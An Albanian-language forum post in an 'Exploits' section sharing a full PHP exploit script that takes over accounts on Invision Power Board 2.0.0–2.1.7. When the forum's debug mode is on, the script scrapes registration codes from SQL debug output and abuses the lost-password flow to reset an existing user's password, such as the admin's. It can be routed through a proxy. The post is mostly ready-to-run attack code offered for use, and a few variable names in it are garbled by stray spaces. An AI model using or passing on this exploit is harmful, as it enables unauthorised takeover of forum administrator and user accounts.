Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  PortalliPortalli  GalleryGallery  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimiidentifikimi  
Kėrko
 
 

Display results as :
 
Rechercher Advanced Search
Tema Fundit
» Rreziqet dhe mbrojtja e rrjetit pa tela
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeMon Dec 19, 2011 3:20 pm nga baton

» Download 62 Programe
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeThu Dec 15, 2011 12:09 pm nga muha

» Paraqitni problemet tuaja
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeWed Dec 14, 2011 12:55 pm nga muha

» Nese e kini XP jo Origjinal atehere merrne patjeter ket Software
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeSun Dec 20, 2009 6:03 am nga CLIRIMI

» Chocolatier 2: The Secret Ingredient
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeMon Nov 02, 2009 7:38 pm nga konvict

» Beni KErKEsa pER fIlmA
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeThu May 07, 2009 11:20 am nga ZAMIRI75

» Exclamation 1 menyr per web hacking
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeSat Feb 07, 2009 5:11 pm nga p!rAt-xXx

» SONY ERICSSON S001 – I KA TĖ GJITHA
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeTue Feb 03, 2009 2:55 am nga p!rAt-xXx

» prezentimi
Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeWed Oct 29, 2008 9:10 pm nga Shkodran

Navigacion
 Portalli
 Indeksi
 Lista e Anėtarėve
 Profili
 Kėrko
Shiko rezultatet live

 

 Shikoni kete exploit e gjeta hte eshte per Hack Phbb

Shko poshtė 
AutoriMesazh
Shpetimii
Webmaster
Webmaster
Shpetimii


Male
Numri i postimeve : 277
Job/hobbies : Programing and Design
Registration date : 03/02/2008

Shikoni kete exploit e gjeta hte eshte per Hack Phbb Empty
MesazhTitulli: Shikoni kete exploit e gjeta hte eshte per Hack Phbb   Shikoni kete exploit e gjeta hte eshte per Hack Phbb Icon_minitimeSun Apr 06, 2008 12:53 am


<?php
// -----------------------------
//Debug Mode password change vulnerability
//Affects Invision Power Borard 2.0.0 to 2.1.7
//by Rapigator

//This works if:

//"Debug Level" is set to 3
//or
//Enable SQL Debug Mode is turned on

//In General Configuration of the forum software.


// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

// An existing user's login name
$name = "admin";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (
preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset(
$regid) || !isset($regcode)) {
echo
"Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid }&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (
preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (
preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function
change_pass($regcode,$regid,$vid,$userid) {
global
$site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}&regid={$regid}&reg_code={$regcode}&pass1={$p ass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo
"Password Changed!";
exit;
}
?>
Mbrapsht nė krye Shko poshtė
http://www.dinama.net
 
Shikoni kete exploit e gjeta hte eshte per Hack Phbb
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Shikoni kete exploit e gjeta hte eshte per Hack Phbb
» lumturine kerkova por une nuk e gjeta,
» Nukedit 4.9.x Remote Create Admin Exploit

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Exploits-
Kėrce tek: